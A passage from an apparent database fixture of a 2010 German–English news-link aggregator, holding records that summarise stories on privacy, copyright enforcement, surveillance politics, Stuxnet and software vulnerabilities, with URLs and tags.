&lt;/p&gt;</field><field type="CharField" name="external_url">http://heatball.de/</field><field type="FileField" name="page_screenshot">page_shots/2010/09/27/heatballhome.png</field><field type="SlugField" name="slug">heatballhome</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-09-27 11:16:13</field><field to="show.pentashow" name="show" rel="ManyToOneRel">7</field><field type="CharField" name="tags_string">heatball</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="5"></object></field></object><object pk="525" model="submitter.newsentry"><field type="CharField" name="title">gulli.com - news - view - Vier Monate Gefängnis für Facebook-Freundschaft</field><field type="TextField" name="excerpt">Die amerikanische Justiz schickte den Tierrechtsaktivisten Rod Coronado Anfang August für weitere vier Monate hinter Gitter. Er akzeptierte eine Freundschaftsanfrage auf der sozialen Plattform Facebook, was ein klarer Verstoß gegen seine Bewährungsauflagen sei. Diese verwehrten ihm unter anderem den Kontakt zu weiteren radikalen Aktivisten.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Die amerikanische Justiz schickte den Tierrechtsaktivisten Rod Coronado Anfang August für weitere vier Monate hinter Gitter. Er akzeptierte eine Freundschaftsanfrage auf der sozialen Plattform Facebook, was ein klarer Verstoß gegen seine Bewährungsauflagen sei. Diese verwehrten ihm unter anderem den Kontakt zu weiteren radikalen Aktivisten.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.gulli.com/news/vier-monate-gef-ngnis-f-r-facebook-freundschaft-2010-09-26</field><field type="FileField" name="page_screenshot">page_shots/2010/09/26/gullicom-news-view-viermonategefangnisfu.png</field><field type="SlugField" name="slug">gullicom-news-view-viermonategefangnisfu</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-09-26 22:26:59</field><field to="show.pentashow" name="show" rel="ManyToOneRel">7</field><field type="CharField" name="tags_string">facebook</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object></field></object><object pk="524" model="submitter.newsentry"><field type="CharField" name="title">Evercookie: a tracking browser cookie you can't delete</field><field type="TextField" name="excerpt">Samy Kamkar, an open source developer whose motto is "think bad, do good" has released an API called "evercookie." Evercookie sets a nigh-undeletable tracking cookie in your browser, storing the information in eight separate ways; if you try to delete it but leave even one copy of the data around, it will repopulate itself using that last shred. Evercookies can even spread between browsers on the same system. The point of the project is to show that browsers are lagging behind privacy-invaders when it comes to cookie management, and to spur the organizations that publish browsers into creating better tools for privacy management.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Samy Kamkar, an open source developer whose motto is "think bad, do good" has released an API called "evercookie." Evercookie sets a nigh-undeletable tracking cookie in your browser, storing the information in eight separate ways; if you try to delete it but leave even one copy of the data around, it will repopulate itself using that last shred. Evercookies can even spread between browsers on the same system. The point of the project is to show that browsers are lagging behind privacy-invaders when it comes to cookie management, and to spur the organizations that publish browsers into creating better tools for privacy management.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://arstechnica.com/web/news/2010/09/evercookie-escalates-the-zombie-cookie-war-by-raising-awareness.ars</field><field type="FileField" name="page_screenshot">page_shots/2010/09/26/evercookieatrackingbrowsercookieyoucantde.png</field><field type="SlugField" name="slug">evercookieatrackingbrowsercookieyoucantde</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">13</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-09-26 17:58:50</field><field to="show.pentashow" name="show" rel="ManyToOneRel">7</field><field type="CharField" name="tags_string">browser cookie privacy privatssphäre surveillance tracking</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object><object pk="5"></object></field></object><object pk="523" model="submitter.newsentry"><field type="CharField" name="title">Brighton, England town council says that councillor is violating copyright law by youtubing the council meetings</field><field type="TextField" name="excerpt">Jason Kitcat, a town councillor in Brighton, England, faces suspension from the council for posting clips of town meetings to YouTube. The council says that his attempt to "hold the administration politically to account" by trying "to highlight what the he believed were the administration's deficiencies" constitutes a political use of the council's "intellectual property." This is prohibited.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Jason Kitcat, a town councillor in Brighton, England, faces suspension from the council for posting clips of town meetings to YouTube. The council says that his attempt to "hold the administration politically to account" by trying "to highlight what the he believed were the administration's deficiencies" constitutes a political use of the council's "intellectual property." This is prohibited.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://jim.killock.org.uk/blog/brighton-tries-to-use-copyright-to-censor-councillor.html</field><field type="FileField" name="page_screenshot">page_shots/2010/09/26/brightonenglandtowncouncilsaysthatcouncillo.png</field><field type="SlugField" name="slug">brightonenglandtowncouncilsaysthatcouncillo</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">13</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-09-26 17:57:00</field><field to="show.pentashow" name="show" rel="ManyToOneRel">7</field><field type="CharField" name="tags_string">free speech, imaginary property, politics, zensur</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object></field></object><object pk="522" model="submitter.newsentry"><field type="CharField" name="title">Multinational copyright companies will require French ISPs turn over 150,000 subscriber names and addresses per day</field><field type="TextField" name="excerpt">France's "3-strikes" rule comes into effect this week, and multinational corporations are already flooding French ISPs with more than 10,000 requests a day for the personal information of accused infringers; they estimate that this number will go up to 150,000 users/day shortly. Once a user has received three unsubstantiated accusations of infringement, the entire household is cut off from the Internet for a year, and it becomes a crime for any other ISP to connect that family or household. The only opportunity to defend yourself from the charge is a brief "traffic-court"-like streamlined judiciary.
ISPs that are not able to turn over 150,000 personal identities per day face a fine of €1,500 per accused infringer.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;France's "3-strikes" rule comes into effect this week, and multinational corporations are already flooding French ISPs with more than 10,000 requests a day for the personal information of accused infringers; they estimate that this number will go up to 150,000 users/day shortly. Once a user has received three unsubstantiated accusations of infringement, the entire household is cut off from the Internet for a year, and it becomes a crime for any other ISP to connect that family or household. The only opportunity to defend yourself from the charge is a brief "traffic-court"-like streamlined judiciary.
&lt;/p&gt;
&lt;p&gt;ISPs that are not able to turn over 150,000 personal identities per day face a fine of €1,500 per accused infringer.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://torrentfreak.com/france-starts-reporting-millions-of-file-sharers-100921/</field><field type="FileField" name="page_screenshot">page_shots/2010/09/26/no_page_shot.png</field><field type="SlugField" name="slug">multinationalcopyrightcompanieswillrequirefre</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">13</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-09-26 17:54:55</field><field to="show.pentashow" name="show" rel="ManyToOneRel">7</field><field type="CharField" name="tags_string">3strikes, copyfight, digital media, frankreich, imaginary property, isp, mp3, piracy, surveillance</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object></field></object><object pk="521" model="submitter.newsentry"><field type="CharField" name="title">Microsoft's DRM makes your computer vulnerable to attack</field><field type="TextField" name="excerpt">The msnetobj.dll library is an ActiveX control used by Microsoft's DRM; it is intended to prevent the owner of a computer from saving or viewing certain files except under limited circumstances, and to prevent the computer's owner from disabling it or interfering with it.
As if that wasn't bad enough, it is also vulnerable to three separate attacks -- buffer overflow, integer overflow and denial of service -- any of which can compromise your computer's working, leaving your data vulnerable to crooks and vandals.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;The msnetobj.dll library is an ActiveX control used by Microsoft's DRM; it is intended to prevent the owner of a computer from saving or viewing certain files except under limited circumstances, and to prevent the computer's owner from disabling it or interfering with it.
&lt;/p&gt;
&lt;p&gt;As if that wasn't bad enough, it is also vulnerable to three separate attacks -- buffer overflow, integer overflow and denial of service -- any of which can compromise your computer's working, leaving your data vulnerable to crooks and vandals.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.exploit-db.com/exploits/15061/</field><field type="FileField" name="page_screenshot">page_shots/2010/09/26/microsoftsdrmmakesyourcomputervulnerableto.png</field><field type="SlugField" name="slug">microsoftsdrmmakesyourcomputervulnerableto</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">13</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-09-26 17:52:58</field><field to="show.pentashow" name="show" rel="ManyToOneRel">7</field><field type="CharField" name="tags_string">drm exploit microsoft</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="7"></object><object pk="9"></object></field></object><object pk="520" model="submitter.newsentry"><field type="CharField" name="title">Andreas Pfitzmann ist tot</field><field type="TextField" name="excerpt"></field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html"></field><field type="CharField" name="external_url">http://blog.kooptech.de/2010/09/zum-tod-von-andreas-pfitzmann/</field><field type="FileField" name="page_screenshot">page_shots/2010/09/24/andreaspfitzmannisttot.png</field><field type="SlugField" name="slug">andreaspfitzmannisttot</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">17</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-09-24 19:50:17</field><field to="show.pentashow" name="show" rel="ManyToOneRel">7</field><field type="CharField" name="tags_string"></field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="6"></object></field></object><object pk="519" model="submitter.newsentry"><field type="CharField" name="title"> Thomas de Maiziere macht den Schäuble 2.0 : netzpolitik.org</field><field type="TextField" name="excerpt">Schäublette 2.0</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Schäublette 2.0
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.netzpolitik.org/2010/thomas-de-maiziere-macht-den-schauble-2-0/</field><field type="FileField" name="page_screenshot">page_shots/2010/09/25/thomasdemaizieremachtdenschauble20netz001.png</field><field type="SlugField" name="slug">thomasdemaizieremachtdenschauble20netz001</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-09-24 17:37:42</field><field to="show.pentashow" name="show" rel="ManyToOneRel">7</field><field type="CharField" name="tags_string">schaeublette</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object></field></object><object pk="518" model="submitter.newsentry"><field type="CharField" name="title">Wettbewerb &amp;#171; #zensus11 Stoppt die Vollerfassung!</field><field type="TextField" name="excerpt">Logo Wettbewerb zum AK Zensus Logo und Volkszählungsaufkleber</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Logo Wettbewerb zum AK Zensus Logo und Volkszählungsaufkleber
&lt;/p&gt;</field><field type="CharField" name="external_url">http://zensus11.de/wettbewerb/</field><field type="FileField" name="page_screenshot">page_shots/2010/09/24/wettbewerb171zensus11stopptdievollerfas.png</field><field type="SlugField" name="slug">wettbewerb171zensus11stopptdievollerfas</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-09-24 17:35:33</field><field to="show.pentashow" name="show" rel="ManyToOneRel">7</field><field type="CharField" name="tags_string">zensus</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object></field></object><object pk="517" model="submitter.newsentry"><field type="CharField" name="title"> Thomas de Maiziere macht den Schäuble 2.0 : netzpolitik.org</field><field type="TextField" name="excerpt">Unser Bundesinnenminister Thomas de Maiziere spielt jetzt Schäuble 2.0 und fordert einen weiteren Abbau unserer Grundrechte. Zu seinen Forderungen zählen die Erlaubnis zur „Quellen-Telekommunikationsüberwachung“ (Quellen-TKÜ) für den Verfassungsschutz und Strafverfolgungsbehörden, alle Geheimdienste sollen Kontostammdaten abfragen dürfen, in die Strafprozessordnung soll eine Verwertungsbefugnis für alle mittels Online-Durchsuchung gewonnen Daten kommen. Damit wäre die Online-Durchsuchung als reguläres Beweismittel im Strafprozess zugelassen. Außerdem sollen bestehende Regelungen, die zeitlich befristet waren, weiter fortgesetzt werden,</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Unser Bundesinnenminister Thomas de Maiziere spielt jetzt Schäuble 2.0 und fordert einen weiteren Abbau unserer Grundrechte. Zu seinen Forderungen zählen die Erlaubnis zur „Quellen-Telekommunikationsüberwachung“ (Quellen-TKÜ) für den Verfassungsschutz und Strafverfolgungsbehörden, alle Geheimdienste sollen Kontostammdaten abfragen dürfen, in die Strafprozessordnung soll eine Verwertungsbefugnis für alle mittels Online-Durchsuchung gewonnen Daten kommen. Damit wäre die Online-Durchsuchung als reguläres Beweismittel im Strafprozess zugelassen. Außerdem sollen bestehende Regelungen, die zeitlich befristet waren, weiter fortgesetzt werden,
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.netzpolitik.org/2010/thomas-de-maiziere-macht-den-schauble-2-0/</field><field type="FileField" name="page_screenshot">page_shots/2010/09/24/thomasdemaizieremachtdenschauble20netz.png</field><field type="SlugField" name="slug">thomasdemaizieremachtdenschauble20netz</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-09-24 15:49:56</field><field to="show.pentashow" name="show" rel="ManyToOneRel">7</field><field type="CharField" name="tags_string">thomas de maiziere</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="4"></object></field></object><object pk="516" model="submitter.newsentry"><field type="CharField" name="title">Google Instant Blacklist</field><field type="TextField" name="excerpt">Die Google Instant Blacklist.
Like everything these days, great care must be taken to ensure that as few people as possible are offended by anything. Google Instant is no exception. Somewhere within Google there exists a master list of "bad words" and evil concepts that Google Instant is programmed to not act upon, lest someone see something offensive in the instant results... even if that's exactly what they typed into the search bar. We call it Google Blacklist.
Give it a try. Go to the Google home page. Type in "puppy" and see the many results that fill your screen. Now type "bitch" and admire the blank screen. In this case, the two words could mean the exact same thing. But Google Instant is erring on the side of caution, protecting the searcher from seeing something they may not want to see.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Die Google Instant Blacklist.
&lt;/p&gt;
&lt;p&gt;Like everything these days, great care must be taken to ensure that as few people as possible are offended by anything. Google Instant is no exception. Somewhere within Google there exists a master list of "bad words" and evil concepts that Google Instant is programmed to not act upon, lest someone see something offensive in the instant results... even if that's exactly what they typed into the search bar. We call it Google Blacklist.
&lt;/p&gt;
&lt;p&gt;Give it a try. Go to the Google home page. Type in "puppy" and see the many results that fill your screen. Now type "bitch" and admire the blank screen. In this case, the two words could mean the exact same thing. But Google Instant is erring on the side of caution, protecting the searcher from seeing something they may not want to see.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.2600.com/googleblacklist/</field><field type="FileField" name="page_screenshot">page_shots/2010/09/23/unknowntitle002_.png</field><field type="SlugField" name="slug">unknowntitle002</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-09-23 22:22:43</field><field to="show.pentashow" name="show" rel="ManyToOneRel">7</field><field type="CharField" name="tags_string">blacklist google</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="4"></object></field></object><object pk="515" model="submitter.newsentry"><field type="CharField" name="title">Soll die Lörracher Tatwaffe verkauft werden?</field><field type="TextField" name="excerpt">Das Foto der Tatwaffe, mit der eine 41jährige Anwältin in Lörrach am Sonntag um sich schoss, ging rasch um die Welt. Stolz hatte die Polizei das Bild der Walther GSP in die Kameras gehalten, einschließlich zweier Ersatzmagazine. Alles nur geklaut?
Die angebliche Tatwaffe war keine, das Foto aus dem Internet "geliehen" (bei Klick aufs Bild: Ausschnitt aus einer Online-Meldung der WELT, zu Bild 3 klicken)
Das bemerkenswert detaillierte Bild zeigt neben der Pistole und den Magazinen auch einen Trockentrainingsabzug für die Disziplin Olympische Schnellfeuerpistole (OSP) - schon das hatte verwundert, denn für eine Frau, die die Disziplin Sportpistole früher mal geschossen hat, wäre dieser zweite Abzug sinnlos gewesen, da OSP eine reine Männerdisziplin ist.
Aber es war auch gar nicht der Abzug der Täterin - das Foto hat sich die Lörracher Polizei kurzerhand aus dem Internet besorgt: Der Augsburger Waffenhändler Schweigert bietet nämlich genau diese Kleinkaliberpistole zum Verkauf an, so steht es schon länger auf der Gebrauchtwaffen-Website des Verbands Deutscher Büchsenmacher und Waffenfachhändler. 290 Euro soll das "mit leichten Gebrauchsspuren" versehene Stück mit dem gezeigten Zubehör kosten - diese Spuren stammen allerdings sicher nicht von der Mordtat. User des Internetforums Waffen-Online hatten die Doppelung des Fotos gestern entdeckt. Der im Bild angebrachte Copyright-Hinweis "Waffen Schweigert" wurde für die Pressevorführung nicht einmal entfernt, wie das große Foto belegt - Hauptsache, man kann etwas vorweisen: "Dort schoss sie dann mit dieser Waffe um sich."</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Das Foto der Tatwaffe, mit der eine 41jährige Anwältin in Lörrach am Sonntag um sich schoss, ging rasch um die Welt. Stolz hatte die Polizei das Bild der Walther GSP in die Kameras gehalten, einschließlich zweier Ersatzmagazine. Alles nur geklaut?
&lt;/p&gt;
&lt;p&gt;Die angebliche Tatwaffe war keine, das Foto aus dem Internet "geliehen" (bei Klick aufs Bild: Ausschnitt aus einer Online-Meldung der WELT, zu Bild 3 klicken)
Das bemerkenswert detaillierte Bild zeigt neben der Pistole und den Magazinen auch einen Trockentrainingsabzug für die Disziplin Olympische Schnellfeuerpistole (OSP) - schon das hatte verwundert, denn für eine Frau, die die Disziplin Sportpistole früher mal geschossen hat, wäre dieser zweite Abzug sinnlos gewesen, da OSP eine reine Männerdisziplin ist.
Aber es war auch gar nicht der Abzug der Täterin - das Foto hat sich die Lörracher Polizei kurzerhand aus dem Internet besorgt: Der Augsburger Waffenhändler Schweigert bietet nämlich genau diese Kleinkaliberpistole zum Verkauf an, so steht es schon länger auf der Gebrauchtwaffen-Website des Verbands Deutscher Büchsenmacher und Waffenfachhändler. 290 Euro soll das "mit leichten Gebrauchsspuren" versehene Stück mit dem gezeigten Zubehör kosten - diese Spuren stammen allerdings sicher nicht von der Mordtat. User des Internetforums Waffen-Online hatten die Doppelung des Fotos gestern entdeckt. Der im Bild angebrachte Copyright-Hinweis "Waffen Schweigert" wurde für die Pressevorführung nicht einmal entfernt, wie das große Foto belegt - Hauptsache, man kann etwas vorweisen: "Dort schoss sie dann mit dieser Waffe um sich."
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.visier.de/</field><field type="FileField" name="page_screenshot">page_shots/2010/09/23/solldielorrachertatwaffeverkauftwerden.png</field><field type="SlugField" name="slug">solldielorrachertatwaffeverkauftwerden</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-09-23 20:08:09</field><field to="show.pentashow" name="show" rel="ManyToOneRel">7</field><field type="CharField" name="tags_string">photoshop</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="4"></object></field></object><object pk="514" model="submitter.newsentry"><field type="CharField" name="title"> Beginn der ACTA-Verhandlungsrunde in Tokyo : netzpolitik.org</field><field type="TextField" name="excerpt">von Kirsten um 15:21 am Donnerstag, 23. September 2010 | 1 Kommentar
Heute fängt die 11. Verhandlungsrunde über das Antipiraterie-Abkommen ACTA (Anti-Counterfeiting Trade Agreement) in Tokyo an. Das Abkommen soll den Schutz von Urheberrechten im Internet verbessern und Produktfälschungen, gefälschte Medikamente und Datenklau bekämpfen. Die bisher geheim gehaltenen Verhandlungen finden nicht unter der Aufsicht der Welthandelsorganisation (WTO) oder der World Intellectual Property Organization (WIPO) statt. Zu den 39 verhandelnden Staaten gehören neben Europa die USA, Australien, Marokko, Kanada, Japan, Korea, Mexiko, Neuseeland, Singapur und die Schweiz. Durch die vielkritisierte Geheimhaltung und Intransparenz kamen Verhandlungstexte bisher immer nur unvorhergesehen an die Öffentlichkeit. Wie ZeroPaid gestern berichtete, hat wohl noch keine demokratische Institution Großbritanniens den Text zu Gesicht bekommen.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;von Kirsten um 15:21 am Donnerstag, 23. September 2010 | 1 Kommentar
Heute fängt die 11. Verhandlungsrunde über das Antipiraterie-Abkommen ACTA (Anti-Counterfeiting Trade Agreement) in Tokyo an. Das Abkommen soll den Schutz von Urheberrechten im Internet verbessern und Produktfälschungen, gefälschte Medikamente und Datenklau bekämpfen. Die bisher geheim gehaltenen Verhandlungen finden nicht unter der Aufsicht der Welthandelsorganisation (WTO) oder der World Intellectual Property Organization (WIPO) statt. Zu den 39 verhandelnden Staaten gehören neben Europa die USA, Australien, Marokko, Kanada, Japan, Korea, Mexiko, Neuseeland, Singapur und die Schweiz. Durch die vielkritisierte Geheimhaltung und Intransparenz kamen Verhandlungstexte bisher immer nur unvorhergesehen an die Öffentlichkeit. Wie ZeroPaid gestern berichtete, hat wohl noch keine demokratische Institution Großbritanniens den Text zu Gesicht bekommen.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.netzpolitik.org/2010/beginn-der-acta-verhandlungsrunde-in-tokyo/</field><field type="FileField" name="page_screenshot">page_shots/2010/09/23/beginnderacta-verhandlungsrundeintokyonet.png</field><field type="SlugField" name="slug">beginnderacta-verhandlungsrundeintokyonet</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-09-23 15:53:30</field><field to="show.pentashow" name="show" rel="ManyToOneRel">7</field><field type="CharField" name="tags_string">acta</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object></field></object><object pk="513" model="submitter.newsentry"><field type="CharField" name="title">Patent Office Agrees With EFFs Arguments on C2 VoIP Patent | Electronic Frontier Foundation</field><field type="TextField" name="excerpt">Das VoIP-Patent ist gekippt :-) Dank an die EFF.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Das VoIP-Patent ist gekippt :-) Dank an die EFF.
&lt;/p&gt;</field><field type="CharField" name="external_url">https://www.eff.org/deeplinks/2010/09/patent-office-agrees-eff-s-arguments-c2-voip</field><field type="FileField" name="page_screenshot">page_shots/2010/09/23/patentofficeagreeswitheffsargumentsonc2vo.png</field><field type="SlugField" name="slug">patentofficeagreeswitheffsargumentsonc2vo</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-09-23 10:25:44</field><field to="show.pentashow" name="show" rel="ManyToOneRel">7</field><field type="CharField" name="tags_string">eff patent</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="1"></object></field></object><object pk="512" model="submitter.newsentry"><field type="CharField" name="title">Trojaner &amp;#132;stuxnet&amp;#147;: Der digitale Erstschlag ist erfolgt - Digitales Denken - Feuilleton - FAZ.NET</field><field type="TextField" name="excerpt">For the records: Frank hat schon Recht mit "Der digitale Erstschlag ist erfolgt"</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;For the records: Frank hat schon Recht mit "Der digitale Erstschlag ist erfolgt"
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.faz.net/s/RubCEB3712D41B64C3094E31BDC1446D18E/Doc~E8A0D43832567452FBDEE07AF579E893C~ATpl~Ecommon~Scontent.html</field><field type="FileField" name="page_screenshot">page_shots/2010/09/22/trojaner132stuxnet147derdigitaleerstsch.png</field><field type="SlugField" name="slug">trojaner132stuxnet147derdigitaleerstsch</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-09-22 19:37:44</field><field to="show.pentashow" name="show" rel="ManyToOneRel">7</field><field type="CharField" name="tags_string">stuxnet</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object><object pk="4"></object><object pk="8"></object><object pk="9"></object></field></object><object pk="511" model="submitter.newsentry"><field type="CharField" name="title">4chan invades Tea Party website • The Register</field><field type="TextField" name="excerpt">Don't mess w/ 4chan. Funny defacement of teaparty.org
The Oregon Tea Party made the mistake of using the "We Are Legion" slogan of Anonymous, the anti-Scientology movement that spawned in 4chan, in its official materials this summer. In response, Anonymous hacked the Tea Party's Facebook page, posting flames and image macros, before the local branch of the dissident conservative movement promised to stop using the slogan. </field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Don't mess w/ 4chan. Funny defacement of teaparty.org
&lt;/p&gt;
&lt;p&gt;The Oregon Tea Party made the mistake of using the "We Are Legion" slogan of Anonymous, the anti-Scientology movement that spawned in 4chan, in its official materials this summer. In response, Anonymous hacked the Tea Party's Facebook page, posting flames and image macros, before the local branch of the dissident conservative movement promised to stop using the slogan.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.theregister.co.uk/2010/09/22/4chan_spikes_tea_party/</field><field type="FileField" name="page_screenshot">page_shots/2010/09/22/4chaninvadesteapartywebsitetheregister.png</field><field type="SlugField" name="slug">4chaninvadesteapartywebsitetheregister</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-09-22 19:04:22</field><field to="show.pentashow" name="show" rel="ManyToOneRel">7</field><field type="CharField" name="tags_string">4chan teaparty</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"></field></object><object pk="510" model="submitter.newsentry"><field type="CharField" name="title">Microsoft sounds alert on massive Web bug</field><field type="TextField" name="excerpt">Totalschaden.asp MS muss alles was bei denen Web macht patchen. Risk of MitM attack:
Microsoft on Friday warned users that a critical bug in ASP.Net could be exploited by attackers to hijack encrypted Web sessions and pilfer usernames and passwords from Web sites.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Totalschaden.asp MS muss alles was bei denen Web macht patchen. Risk of MitM attack:
&lt;/p&gt;
&lt;p&gt;Microsoft on Friday warned users that a critical bug in ASP.Net could be exploited by attackers to hijack encrypted Web sessions and pilfer usernames and passwords from Web sites.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.computerworld.com/s/article/9186842/Microsoft_sounds_alert_on_massive_Web_bug</field><field type="FileField" name="page_screenshot">page_shots/2010/09/21/unknowntitle001_.png</field><field type="SlugField" name="slug">unknowntitle001</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-09-21 22:31:54</field><field to="show.pentashow" name="show" rel="ManyToOneRel">7</field><field type="CharField" name="tags_string">asp microsoft</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="9"></object></field></object><object pk="509" model="submitter.newsentry"><field type="CharField" name="title">Intel Testing $50 Processor Upgrades at Point of Purchase | We Got Served</field><field type="TextField" name="excerpt">Intel CPU upgrade vom Rubbellos. Featureupgrades nach extra-Kohle.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Intel CPU upgrade vom Rubbellos. Featureupgrades nach extra-Kohle.
